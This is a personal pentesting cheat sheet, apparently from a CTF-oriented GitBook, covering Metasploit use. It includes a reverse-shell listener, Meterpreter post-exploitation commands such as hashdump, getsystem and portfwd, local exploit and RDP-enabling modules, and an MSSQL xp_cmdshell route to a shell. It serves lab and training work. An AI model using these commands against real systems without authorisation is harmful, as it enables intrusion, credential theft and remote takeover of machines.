👹
Hacker's Grimoire
  • Hacker's Grimoire
  • Reconnaissance
    • Passive information gathering
    • Active information gathering
  • Exploitation
    • Web application attacks
      • Local and remote file inclusion
      • File upload bypass
      • Cross-site scripting
      • Cross-site request forgery
      • Server-side request forgery
      • SQL injection
      • Remote code execution
    • Working with exploits
    • Password cracking
    • Metasploit
    • Buffer overflow
  • Post exploitation
    • Privilege escalation: Linux
    • Privilege escalation: Windows
  • Linux basics
  • Windows basics
  • Learning resources
Powered by GitBook
On this page
  • Advanced options
  • Meterpreter
  • Basic commands
  • Sessions
  • Useful exploits
  • Windows
  • MSSQL
  1. Exploitation

Metasploit

PreviousPassword crackingNextBuffer overflow

Last updated 2 years ago

This page is just basic stuff I forget all the time. There are other Metasploit tips in sections where it's relevant.

Advanced options

Metasploit is so derp-easy that you can often exploit a machine by setting the remote IP in RHOST and hitting the pew-pew button.

But sometimes that doesn't work and you cry because you know you're just a lame script kiddie pretending to be a hacker. However, you can aspire to be a decent script kiddie by knowing how to use more advanced options in Metasploit.

Exploits might not work because of an unusual configuration or path issue, which you can set with either show options or show advanced. The advanced section may let you setverbose = true to provide more information about why an exploit isn't working.

You might also need to set the correct target:

show targets
set target [target number]

sometimes needs this because the module can't always identify the exact operating system version and language pack.

It's also important to pay attention to the default payload. Occasionally, you'll run into something weird like an Apache web server running on Windows, so the default Unix payload won't work.

Check and modify the payload:

show payloads
set payload [whatever]

Meterpreter

To catch shells using meterpreter:

use exploit/multi/handler
set LHOST [attack machine]
set LPORT 443
run

If you're VPNed into a lab, pay attention to the IP address. I've noticed that the first time this module runs, it defaults to eth0 and you have to restart it to use something like tap0.

Basic commands

Frequently used commands, mostly to enumerate a victim machine:

getuid      # get current user
sysinfo     # gets OS and hostname
execute     # execute a command
cd          # change directory
pwd         # print working directory
ls          # list files in current directory
mkdir       # make a directory
del         # delete a file
cat         # read the contents of a file
download    # download a file to your machine
hashdump    # get contents of password file
edit        # edit a file with vim
rm          # delete a file
rmdir       # remove directory
upload      # upload a file to the victim
ps          # list running processes
migrate     # move the active process to a designated PID
getpid      # get the current process ID (PID)
kill        # terminate a process by PID
ipconfig    # display network interfaces
portfwd     # forward a port on the victim to a remote service
route       # view or modify routing table
getprivs    # get as many privileges as possible
getsystem   # get Administrator
reboot      # reboot the victim
shutdown    # shut down the victim
reg         # interact with the victim's registry

Sessions

To list active sessions:

sessions -l

To enter a session:

sessions -i [session number]

To enter a shell from a session (not use meterpreter commands):

shell

To exit the shell and return to meterpreter, type exit.

Useful exploits

I mostly use Metasploit on Windows machines because they still feel tricky to me. Below is a list of useful exploits for enumerating and running complex commands.

Windows

Once you have a meterpreter shell, you can scan for local exploits and run them. Unlike remote exploits which target using IP addresses, local exploits run against a chosen shell session.

To access local exploits, you'll need to jump out of meterpreter using background and select one with the use command:

meterpreter > background
use /exploit/windows/whatever
show options
[edit options as needed]
set SESSION [session number]
run

Check for exploits:

meterpreter > run post/multi/recon/local_exploit_suggester

Get a remote desktop:

meterpreter > run post/windows/manage/enable_rdp

Run a command as a different user:

background
use post/windows/manage/run_as
[set username and password]
set CMDOUT true # output results of command
set CMD "type C:\Users\Administrator\Desktop\root.txt"
run

MSSQL

If you have credentials, you can use this module to get a shell:

exploit/windows/mssql/mssql_payload
[set username and password]
run
sqsh -S [remote host]:[port] -U [username] -P [password]

You can then attempt to launch xp_cmdshell with the following syntax:

xp_cmdshell 'date'
go

Meterpreter is nice because it lets you maintain multiple shell sessions and use local exploits against them. For example, the always seems to fire a few times and with meterpreter, you can catch every shell session with a single listener.

There are but I haven't tried them because I'm lazy.

It uses the xp_cmdshell stored procedure, . You could probably do the same exploit manually using a tool like , but I haven't managed it yet. If you're attacking a very old version of MSSQL (e.g. 2000), you can connnect to it using :

MSO8-067
Rejetto exploit
manual ways to run commands as different user
which isn't always enabled but can be
dbeaver
sqsh